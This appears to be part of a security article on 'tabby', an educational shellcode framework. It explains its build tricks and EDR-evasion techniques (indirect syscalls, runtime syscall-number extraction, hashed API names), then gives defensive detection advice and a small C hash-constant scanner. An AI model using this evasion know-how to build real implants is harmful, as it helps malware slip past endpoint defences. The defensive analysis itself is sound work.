    mingw64 places C globals in .bss, which our linker script discards. defining the slots in NASM’s .text section guarantees they survive objcopy --only-section=.text and the stubs’ [rel ssn_*] displacements resolve correctly

linker script at . = 0 + .rdata$* .text$* merged into .text
    lets objcopy --only-section=.text produce a flat binary starting at offset 0 with no PE overhead; the $* wildcards catch COFF section groups emitted by -ffunction-sections/-fdata-sections

entry stub sub rsp, 0x20 (not 0x28)
    after push rbx/rdi/rsi the stack is already 16-aligned. sub rsp, 0x20 (32, a multiple of 16) preserves alignment so sc_main receives the Win64-ABI-correct RSP mod 16 = 8. otherwise MOVAPS inside any Windows DLL (e.g. CreateProcess inside WinExec) raises #AC and the thread dies silently

FNV-1a over CRC32
    equally fast, no special instructions required, fits in 6 lines of C

per-function SSN slots
    avoids a generic do_syscall(ssn, ...) wrapper that would need to shift a variable number of stack arguments; each stub has the exact Win64 signature the kernel expects
Compiler-flag and design-decision rationale for tabby. Source: original repository README.

Key Takeaways

  • Every technique tabby uses has been seen before. The contribution is the small, readable surface area: ~500 lines of C plus ~80 lines of NASM, with a one-paragraph rationale for every non-obvious choice. It’s built explicitly as a teaching artifact for the Malware Development for Ethical Hackers course.
  • Linux-only toolchain matters more than it sounds. mingw-w64 + nasm + a custom linker script + objcopy means no Windows / MSVC / Wine in the build pipeline — it also means CI for malware-research courses can run on stock Linux runners without complex VM orchestration.
  • Indirect syscalls are the headline EDR-evasion technique on display. Jumping to ntdll’s own syscall; ret defeats both inline-hook detection and call-stack-aware detectors that flag syscalls returning into non-ntdll memory.
  • SSNs are extracted at runtime, not hard-coded. Scanning the ntdll stub for the 0xB8 (mov eax, imm32) byte pattern means the same shellcode works across Windows builds even as Microsoft reshuffles syscall numbers.
  • FNV-1a + STACKSTR eliminate plaintext IOCs. No DLL or function names in .rdata, no plaintext payload strings — everything is either hashed at compile time or pushed onto the stack at runtime.
  • The flat-binary trick is mostly the linker script. The . = 0 placement, the .rdata$* .text$* wildcard merge into a single .text, and the explicit discard of .data/.bss together let objcopy --only-section=.text produce a byte-zero-aligned blob with no PE overhead.
  • The -mcmodel=small flag is load-bearing. The README explicitly calls this out: without it, mingw-w64 introduces .refptr.<sym> indirection that breaks at VMA = 0. Anyone reproducing this trick on their own toolchain must keep this flag.

Defensive Recommendations

  • Don’t rely on inline-hook detection alone. Indirect-syscall frameworks like tabby render ntdll inline hooks useless — the hooked bytes are stepped over because the shellcode jumps directly to the post-hook syscall; ret. Pair user-mode hooks with kernel-level telemetry (PsSetCreateThreadNotifyRoutineEx, ETW Threat Intelligence, syscall provenance) to catch the actual syscall regardless of how the call site reached it.
  • Hunt for call-stack provenance, not just call-stack-inside-ntdll. Indirect syscalls leave the kernel-visible return address inside ntdll, but the stack frame below that is still attacker-controlled memory. Detection rules that walk the call stack and check whether the parent frame is mapped to a backed PE file (rather than an RX/RWX private allocation) will surface tabby-style payloads. Pavel Yosifovich’s and ETW Threat Intelligence based detectors do this; build it into your EDR if it isn’t there.
  • RWX private allocations from non-PE code are still the high-signal IOC. The bundled loader maps the shellcode RWX because the syscall stubs write SSNs into their own .text at runtime. Any modern EDR should treat the creation of an RWX private allocation that subsequently hosts an executing thread (via CreateThread on the allocation base) as a near-certain malicious pattern outside of very narrow benign exceptions (JIT compilers in known processes).
  • Audit ETW Threat Intelligence event volume. EDRs that consume ETW-TI get a syscall-level view that bypasses user-mode hooks entirely. If your stack disables ETW-TI (some performance-tuned deployments do) you are blind to exactly this class of attack.
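  • Block or alert on VirtualProtect/NtProtectVirtualMemory transitions from RW to RX/RWX on private allocations from low-trust contexts, using EDR rules or, where it can be enabled, a process mitigation such as Arbitrary Code Guard. WDAC/AppLocker policies do not inspect page protections, but they can keep untrusted loaders from running in the first place. The loader’s explicit RW → RWX flip is one of the single highest-signal events you can hook.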
  • Treat unique FNV-1a / DJB2 / similar hash constants as YARA signal. 0xca67b978 (the FNV-1a hash of NtAllocateVirtualMemory) is a fingerprint of this exact tooling pattern. Build YARA rules that flag binaries or memory regions containing several such API-name hash constants at once, since a single 32-bit value can also occur by chance.
  • Process memory scanning that walks executable allocations and looks for missing PE headers at the start of the allocation is a high-confidence detector for flat-shellcode loaders. tabby’s shellcode.bin is byte-for-byte recognizable as not a PE because it begins with the entry stub at offset 0.
  • Educational frameworks like this are a defender’s gift. Read tabby end-to-end as a study of where modern offensive tooling actually puts its evasion. The same mechanics are present in commercial C2 frameworks at far greater scale; reading the minimal version helps your detection engineers reason about the full implementation.
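
The hash-constant recommendation above can be prototyped outside YARA. The following is a rough sketch under stated assumptions: contains_le32 and count_hash_hits are hypothetical helpers, and the watch list would be filled with constants such as the two quoted earlier in this article (0xca67b978 and 0xa62a3b3b). A real rule would need a much larger list and a threshold tuned against benign binaries.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Does buf contain the 32-bit constant v in little-endian byte order,
 * as it would appear as an immediate in x64 code? */
int contains_le32(const uint8_t *buf, size_t len, uint32_t v)
{
    assert(buf != NULL);
    for (size_t i = 0; i + 4 <= len; i++) {
        if (buf[i]     == (uint8_t)(v)       &&
            buf[i + 1] == (uint8_t)(v >> 8)  &&
            buf[i + 2] == (uint8_t)(v >> 16) &&
            buf[i + 3] == (uint8_t)(v >> 24))
            return 1;
    }
    return 0;
}

/* Count how many of the watched constants appear at least once. */
size_t count_hash_hits(const uint8_t *buf, size_t len,
                       const uint32_t *watch, size_t nwatch)
{
    assert(watch != NULL);
    size_t hits = 0;
    for (size_t i = 0; i < nwatch; i++)
        hits += (size_t)contains_le32(buf, len, watch[i]);
    return hits;
}
```

Requiring two or more distinct hits before alerting reflects the point that one 32-bit match on its own is weak evidence.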

Conclusion

tabby is interesting because it is small. Every line of code has a reason in the README, the entire build runs on Linux, and the four canonical evasion techniques — position-independent code, IAT-less API resolution, indirect NT syscalls past EDR hooks, and runtime SSN extraction — are laid out in roughly 500 lines of C and 80 of NASM. It is a teaching artifact, not a weapon, and the author calls that out explicitly. For defenders, it is a clean reference of exactly what they should expect to see in modern malware that does its job well, and exactly which detection patterns survive when the obvious ones (inline-hook detection, ntdll call-stack heuristics) don’t. The full source is on GitHub at cocomelonc/tabby.

Original text: cocomelonc/tabby on GitHub by cocomelonc. This tool is a proof of concept for educational purposes only; the original author takes no responsibility for any damage caused by misuse.
